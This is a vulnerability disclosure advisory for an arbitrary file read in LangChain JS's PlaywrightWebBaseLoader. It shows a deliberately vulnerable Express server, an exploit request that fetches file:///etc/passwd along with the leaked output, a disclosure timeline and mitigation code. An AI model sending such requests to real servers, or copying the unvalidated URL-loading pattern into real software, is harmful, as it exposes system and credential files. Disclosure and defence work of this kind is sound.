LangChain JS Arbitrary File Read Vulnerability

Vendor: LangChain

Vendor URL: https://github.com/langchain-ai/langchainjs

Versions Affected:

  • LangChain JS 0.2.2
  • LangChain Community 0.2.2
  • * The first test was conducted with the Langchain JS version 0.1.37, but I observed that it was affected in the latest version.

Advisory URL: https://huntr.com/bounties/23f45984-7336-48d8-a373-75b39bcd6367

CVE Identifier: N/A

Risk: High (vendor classified as Informative)

Summary

LangChain is an open-source framework designed to assist the development of applications powered by large language models (LLMs). It supports various use cases, including document analysis, summarization, chatbots, and code analysis. LangChain offers libraries in both Python and JavaScript (LangChain JS), enabling developers to integrate LLMs into their applications easily.

The LangChain includes Python and JavaScript libraries. My research is related to the Js library. The fact that this project has more than 11,000 stars and more than 380,000 weekly downloads shows its popularity and widespread use.

I discovered an Arbitrary File Read (AFR) vulnerability in LangChain JS library. This vulnerability allows an attacker to read files on the server that they should not be accessing. When combined with Server Side Request Forgery (SSRF), an attacker can exploit SSRF to read arbitrary files on the server and expose sensitive information.

Utilizing AFR using SSRF

To exploit AFR using SSRF, the attacker takes advantage of the ability to manipulate the URL in SSRF to access local files on the server. This is typically performed by creating URLs that point to internal resources, such as file:// URIs or internal IP addresses.

Example

Imagine a web application that provides a URL preview feature. The application fetches the contents of the provided URL to create a preview. If the application does not properly validate the input URL, an attacker could provide a URL pointing to a local file.

Vulnerable Code Snippet

import express from 'express';
import { PlaywrightWebBaseLoader } from "@langchain/community/document_loaders/web/playwright";

const app = express();
const PORT = 9000;

app.get('/', async (req, res) => {
    const url = req.query.url;

    if (!url) {
        return res.status(400).send('URL query parameter is required');
    }

    try {
        const loader = new PlaywrightWebBaseLoader(url);
        const docs = await loader.load();

        console.log(docs);
        res.send(docs);

    } catch (error) {
        console.error(error);
        res.status(500).send('An error occurred');
    }
});

app.listen(PORT, () => {
    console.log(`Server is running on port ${PORT}`);
});

Steps to Exploit

Modify the URL to point to a local file on the server. I used the file:// url schema. For example:

Req:

GET /?url=file:%2f%2f%2fetc%2fpasswd HTTP/1.1
Host: localhost:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0

Res:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 1322
ETag: W/"52a-DLYTBSZq3dJBHi2DbnbTl6+tY1Y"
Date: Fri, 24 May 2024 20:59:48 GMT
Connection: keep-alive
Keep-Alive: timeout=5

[{"pageContent":"
root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nnode:x:1000:1000::/home/node:/bin/bash\nsystemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin\nmessagebus:x:100:102::/nonexistent:/usr/sbin/nologin\n
","metadata":{"source":"file:///etc/passwd"}}]

You can access the PoC code at the following url and try it out yourself.

Langchain AFR PoC

Mitigation

General recommendations:

  • Input Validation: Ensure URLs are properly validated and sanitized.
  • Allowed Domains List: Restrict URL fetching to a specific set of trusted domains.
  • Deny Sensitive Schemas: Block file://, ftp:// and other schemas that should not be accessed.
  • Network Segmentation: Limit access to internal network resources.

Also, the URL library for the node.js provides tools to help implement these recommendations. The new URL statement creates a new URL object that provides access to the components of the URL from the incoming URL string. Here is an example application:

const urlString = "https://example.com";
try {
    const parsedUrl = new URL(urlString);
    if (parsedUrl.protocol !== 'http:' && parsedUrl.protocol !== 'https:') {
        throw new Error('Unsupported protocol');
    }
} catch (error) {
    console.error('Invalid URL:', error.message);
}
       

This code snippet ensures that only the HTTP and HTTPS protocols are accepted.

Disclosure

This vulnerability was reported to the LangChain team and marked as Informative. It stated that the project was actually using the Playwright project in the background and that the developers were responsible for its use.

However, import { PlaywrightWebBaseLoader } from “langchain/document_loaders/web/playwright”; Since PlaywrightWebBaseLoader is offered here for LangChain, I think there is a high risk.

Also, when I reviewed the Langchain documentation (Link), I could not find any guidelines indicating what measures should be taken when receiving a URL from a user.

Update 1

After the Github PR(Link), it was informed that docstring can be added but no changes will be made to the code.

Timeline

2024-05-25 - v1.0

2024-05-30 - v1.1